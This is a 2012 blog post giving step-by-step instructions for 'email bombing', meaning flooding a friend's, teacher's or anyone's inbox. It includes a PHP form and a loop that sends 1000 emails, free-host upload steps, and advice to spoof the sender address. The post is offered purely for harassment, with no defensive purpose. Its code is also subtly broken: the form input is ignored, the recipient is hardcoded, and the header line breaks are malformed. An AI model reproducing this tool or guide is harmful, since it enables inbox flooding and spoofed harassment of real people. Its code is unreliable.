Ads 468x60px

Friday 9 November 2012

Email Bombing

Want to bother your friends teacher and any person. Bomb their inbox with emails.
For bombing your friend's or anyone's inbox, you need a website that support php scripting.
There are a lots of option available for free, google it.
I advise you to use My3gb.com.

Step 1: Copy the following code and paste on a blank notepad document. Save the notepad with any filename with the .php extension. At the time of saving the document on file name type <your file name>.php

<h1>Absolute Stuff's Email Bombing</h1>
<table border=2>
  <form action="" method=post>
<tr><td>Recipent: </td><td><input type=text name=email size=30></td></tr>
<tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr>
<tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr>
<tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr>
<tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr>
<tr><td><input type=submit value="Send Mail"></td></tr>
</form>
</table>

<?php
$to = 'nobody@example.com';
$subject = 'the subject';
$message = 'hello';
$headers = 'From: webmaster@example.com'  .  "rn"  .
       'Reply-To: webmaster@example.com'  .  "rn"  .
       'X-Mailer: PHP/'  .  phpversion();

for ($i=1; $i <= 1000; $i++)
{
mail($to, $subject, $message, $headers );
}
?>


Step 2: Go to My3gb.com and create an account. Then go to control panel and file manager. Upload the file which you created before with the php extension.

Step 3: Just click on the file from the file manager the file will open in a new window. Now you're done just fill the form as given and type your message and click on send.
In Recipient you must write a valid email address and in sender email you can type any email address. 

Share if you liked this Post using your favorite sharing service:

Subscribe Updates, Its FREE!

0 comments:

Post a Comment

 
Related Posts Plugin for WordPress, Blogger...